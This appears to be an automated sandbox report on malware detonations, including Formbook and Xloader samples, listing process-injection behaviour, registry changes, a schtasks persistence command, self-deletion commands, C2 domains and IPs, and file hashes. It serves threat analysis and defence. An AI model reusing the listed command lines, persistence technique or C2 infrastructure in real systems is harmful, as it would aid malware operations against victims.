memory/768-201-0x0000000000000000-mapping.dmp
memory/764-202-0x0000000000000000-mapping.dmp
memory/764-206-0x0000000019520000-0x0000000019522000-memory.dmp
memory/764-207-0x0000000019524000-0x0000000019526000-memory.dmp
memory/764-238-0x000000001952A000-0x0000000019549000-memory.dmp
memory/2036-239-0x0000000000000000-mapping.dmp
memory/1672-240-0x0000000000000000-mapping.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win10v20210410
Max time kernel
133s
Max time network
115s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2" | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Documents" | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe
"C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win10v20210410
Max time kernel
11s
Max time network
118s
Command Line
Signatures
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4440 set thread context of 4812 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4440 wrote to memory of 4812 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 4440 wrote to memory of 4812 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 4440 wrote to memory of 4812 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 4440 wrote to memory of 4812 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Order.exe
"C:\Users\Admin\AppData\Local\Temp\Order.exe"
C:\Users\Admin\AppData\Local\Temp\Order.exe
"C:\Users\Admin\AppData\Local\Temp\Order.exe"
Network
Files
memory/4812-114-0x000000000040188B-mapping.dmp
memory/4812-115-0x00000000022F0000-0x000000000230A000-memory.dmp
memory/4812-117-0x0000000002340000-0x0000000002341000-memory.dmp
memory/4812-116-0x0000000000400000-0x0000000000430000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win7v20210408
Max time kernel
11s
Max time network
48s
Command Line
Signatures
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\39c1e12e0ada85fa835b623a4698345bf95372bea57a7d3a5070ea1d5d5d825c.js
Network
Files
Analysis: behavioral16
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win10v20210410
Max time kernel
55s
Max time network
118s
Command Line
Signatures
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3200 set thread context of 4008 | N/A | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe
"C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe"
C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe
"C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe"
Network
Files
memory/3200-114-0x0000000000260000-0x0000000000261000-memory.dmp
memory/3200-116-0x0000000004C10000-0x0000000004C11000-memory.dmp
memory/3200-117-0x00000000051B0000-0x00000000051B1000-memory.dmp
memory/3200-118-0x0000000004CB0000-0x0000000004CB1000-memory.dmp
memory/3200-119-0x0000000004BB0000-0x0000000004BB1000-memory.dmp
memory/3200-120-0x0000000004EA0000-0x0000000004EA1000-memory.dmp
memory/3200-121-0x0000000004B70000-0x0000000004C0C000-memory.dmp
memory/3200-122-0x0000000005180000-0x000000000519B000-memory.dmp
memory/3200-123-0x0000000008620000-0x00000000086B0000-memory.dmp
memory/3200-124-0x0000000008710000-0x000000000875B000-memory.dmp
memory/4008-126-0x00000000004025AC-mapping.dmp
memory/4008-125-0x0000000000400000-0x0000000000448000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win10v20210408
Max time kernel
150s
Max time network
160s
Command Line
Signatures
Xloader
suricata: ET MALWARE FormBook CnC Checkin (GET)
Xloader Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 656 set thread context of 2016 | N/A | C:\Users\Admin\AppData\Local\Temp\USD $.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 2016 set thread context of 3060 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 640 set thread context of 3060 | N/A | C:\Windows\SysWOW64\svchost.exe | C:\Windows\Explorer.EXE |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\USD $.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\USD $.exe
"C:\Users\Admin\AppData\Local\Temp\USD $.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
C:\Windows\SysWOW64\autoconv.exe
"C:\Windows\SysWOW64\autoconv.exe"
C:\Windows\SysWOW64\svchost.exe
"C:\Windows\SysWOW64\svchost.exe"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | www.lovecartoonforever.com | udp |
| N/A | 8.8.8.8:53 | www.formerknown.com | udp |
| N/A | 199.34.228.164:80 | www.formerknown.com | tcp |
| N/A | 8.8.8.8:53 | www.carap.club | udp |
| N/A | 104.21.29.206:80 | www.carap.club | tcp |
| N/A | 8.8.8.8:53 | www.wiloasbanhsgtarewdasc.solutions | udp |
| N/A | 8.8.8.8:53 | www.arodsr.com | udp |
| N/A | 66.235.200.146:80 | www.arodsr.com | tcp |
| N/A | 8.8.8.8:53 | www.blockchaincloud360.com | udp |
| N/A | 34.75.70.164:80 | www.blockchaincloud360.com | tcp |
| N/A | 8.8.8.8:53 | www.lebullterrier.com | udp |
| N/A | 142.250.179.179:80 | www.lebullterrier.com | tcp |
| N/A | 8.8.8.8:53 | www.panyu-qqbaby.com | udp |
| N/A | 107.160.109.196:80 | www.panyu-qqbaby.com | tcp |
| N/A | 8.8.8.8:53 | www.ovtnywveba.club | udp |
| N/A | 8.8.8.8:53 | www.awdjob.info | udp |
| N/A | 34.102.136.180:80 | www.awdjob.info | tcp |
| N/A | 8.8.8.8:53 | www.warrenswindowcleans.co.uk | udp |
| N/A | 85.233.160.22:80 | www.warrenswindowcleans.co.uk | tcp |
| N/A | 8.8.8.8:53 | www.tongaoffshore.com | udp |
| N/A | 195.149.84.100:80 | www.tongaoffshore.com | tcp |
| N/A | 8.8.8.8:53 | www.regarta.com | udp |
| N/A | 173.239.5.6:80 | www.regarta.com | tcp |
| N/A | 8.8.8.8:53 | www.elgallocoffee.com | udp |
| N/A | 192.185.0.218:80 | www.elgallocoffee.com | tcp |
| N/A | 8.8.8.8:53 | www.donjrisdumb.com | udp |
Files
memory/656-114-0x00000000008C0000-0x00000000008C1000-memory.dmp
memory/656-116-0x0000000007B60000-0x0000000007B61000-memory.dmp
memory/656-117-0x0000000007700000-0x0000000007701000-memory.dmp
memory/656-118-0x0000000007660000-0x0000000007B5E000-memory.dmp
memory/656-119-0x00000000076D0000-0x00000000076D1000-memory.dmp
memory/656-120-0x0000000009B40000-0x0000000009B41000-memory.dmp
memory/656-121-0x0000000002AD0000-0x0000000002AD2000-memory.dmp
memory/656-122-0x0000000009420000-0x00000000094A6000-memory.dmp
memory/656-123-0x00000000062D0000-0x0000000006306000-memory.dmp
memory/2016-124-0x0000000000400000-0x0000000000428000-memory.dmp
memory/2016-125-0x000000000041D000-mapping.dmp
memory/2016-126-0x0000000001020000-0x0000000001340000-memory.dmp
memory/3060-128-0x0000000006950000-0x0000000006AC0000-memory.dmp
memory/2016-127-0x0000000000AF0000-0x0000000000B00000-memory.dmp
memory/640-129-0x0000000000000000-mapping.dmp
memory/772-130-0x0000000000000000-mapping.dmp
memory/640-132-0x0000000000E40000-0x0000000000E68000-memory.dmp
memory/640-131-0x0000000000E70000-0x0000000000E7C000-memory.dmp
memory/640-133-0x0000000003720000-0x0000000003A40000-memory.dmp
memory/640-134-0x00000000034C0000-0x000000000354F000-memory.dmp
memory/3060-135-0x0000000006CD0000-0x0000000006E00000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:40
Platform
win7v20210408
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral3
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win7v20210408
Max time kernel
148s
Max time network
140s
Command Line
Signatures
Formbook
suricata: ET MALWARE FormBook CnC Checkin (GET)
Formbook Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1608 set thread context of 364 | N/A | C:\Users\Admin\AppData\Local\Temp\_____ ______ ____#454326_PDF.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 364 set thread context of 1212 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 1652 set thread context of 1212 | N/A | C:\Windows\SysWOW64\svchost.exe | C:\Windows\Explorer.EXE |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_____ ______ ____#454326_PDF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_____ ______ ____#454326_PDF.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\_____ ______ ____#454326_PDF.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\_____ ______ ____#454326_PDF.exe
"C:\Users\Admin\AppData\Local\Temp\_____ ______ ____#454326_PDF.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tUlSEv" /XML "C:\Users\Admin\AppData\Local\Temp\tmpDD73.tmp"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\SysWOW64\svchost.exe
"C:\Windows\SysWOW64\svchost.exe"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | www.mkolgems.com | udp |
| N/A | 34.102.136.180:80 | www.mkolgems.com | tcp |
| N/A | 8.8.8.8:53 | www.patriotstrong.net | udp |
| N/A | 23.227.38.74:80 | www.patriotstrong.net | tcp |
Files
memory/1608-60-0x0000000001030000-0x0000000001031000-memory.dmp
memory/1608-62-0x0000000004D90000-0x0000000004D91000-memory.dmp
memory/1608-63-0x0000000000960000-0x000000000097B000-memory.dmp
memory/1608-64-0x0000000005F90000-0x0000000006008000-memory.dmp
memory/1608-65-0x0000000000E20000-0x0000000000E53000-memory.dmp
memory/1628-66-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\tmpDD73.tmp
| MD5 | 43cb1c32af4e2e2dde7dc771ec2b0c44 |
| SHA1 | c975a4c28be5eb7864f6dfef58638b0707e7791b |
| SHA256 | 0ea611bb91ed3a9aac67da012266a0cca65754ede293b165ff0426d7e362aaf0 |
| SHA512 | 1a3e99dbd3da60a31058711da3b4cad3be7cbf4a67de9977c28565a68afd9f3d0eb18c8cc00d73a496c058549942956510f969fdd502e95dfeeacc67436cdb5f |
memory/364-68-0x0000000000400000-0x000000000042E000-memory.dmp
memory/364-69-0x000000000041EBD0-mapping.dmp
memory/364-70-0x00000000008C0000-0x0000000000BC3000-memory.dmp
memory/364-71-0x0000000000290000-0x00000000002A4000-memory.dmp
memory/1212-72-0x0000000004310000-0x00000000043EB000-memory.dmp
memory/1652-73-0x0000000000000000-mapping.dmp
memory/2016-74-0x0000000000000000-mapping.dmp
memory/1652-75-0x0000000000070000-0x0000000000078000-memory.dmp
memory/1652-76-0x00000000000E0000-0x000000000010E000-memory.dmp
memory/1652-77-0x0000000000A10000-0x0000000000D13000-memory.dmp
memory/1652-78-0x00000000004B0000-0x0000000000543000-memory.dmp
memory/1212-79-0x0000000004450000-0x0000000004527000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win10v20210410
Max time kernel
150s
Max time network
137s
Command Line
Signatures
Formbook
suricata: ET MALWARE FormBook CnC Checkin (GET)
Formbook Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3056 set thread context of 2092 | N/A | C:\Users\Admin\AppData\Local\Temp\_____ ______ ____#454326_PDF.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 2092 set thread context of 3064 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 2092 set thread context of 3064 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 1040 set thread context of 3064 | N/A | C:\Windows\SysWOW64\control.exe | C:\Windows\Explorer.EXE |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\control.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\control.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\_____ ______ ____#454326_PDF.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\control.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\_____ ______ ____#454326_PDF.exe
"C:\Users\Admin\AppData\Local\Temp\_____ ______ ____#454326_PDF.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tUlSEv" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF1F7.tmp"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\SysWOW64\autoconv.exe
"C:\Windows\SysWOW64\autoconv.exe"
C:\Windows\SysWOW64\autoconv.exe
"C:\Windows\SysWOW64\autoconv.exe"
C:\Windows\SysWOW64\autoconv.exe
"C:\Windows\SysWOW64\autoconv.exe"
C:\Windows\SysWOW64\autoconv.exe
"C:\Windows\SysWOW64\autoconv.exe"
C:\Windows\SysWOW64\control.exe
"C:\Windows\SysWOW64\control.exe"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | www.vkgcrew.com | udp |
| N/A | 119.8.53.236:80 | www.vkgcrew.com | tcp |
| N/A | 8.8.8.8:53 | www.stconstant.online | udp |
| N/A | 5.101.152.6:80 | www.stconstant.online | tcp |
| N/A | 8.8.8.8:53 | www.volebahis.com | udp |
| N/A | 34.102.136.180:80 | www.volebahis.com | tcp |
Files
memory/3056-114-0x0000000000850000-0x0000000000851000-memory.dmp
memory/3056-116-0x00000000057C0000-0x00000000057C1000-memory.dmp
memory/3056-117-0x0000000005190000-0x0000000005191000-memory.dmp
memory/3056-118-0x00000000050F0000-0x0000000005182000-memory.dmp
memory/3056-119-0x0000000005170000-0x0000000005171000-memory.dmp
memory/3056-120-0x00000000054B0000-0x00000000054B1000-memory.dmp
memory/3056-121-0x0000000005770000-0x000000000578B000-memory.dmp
memory/3056-122-0x0000000008860000-0x00000000088D8000-memory.dmp
memory/3056-123-0x00000000088F0000-0x0000000008923000-memory.dmp
memory/1328-124-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\tmpF1F7.tmp
| MD5 | 45fa426b3bab2138ff2f5ad8c725fcb3 |
| SHA1 | acd36473912bb5e502369c40415e6a6d432bcd69 |
| SHA256 | 3e7b904f103e294745c8b1b06a7a5e152d084218707cdfac6d668b6161a028d5 |
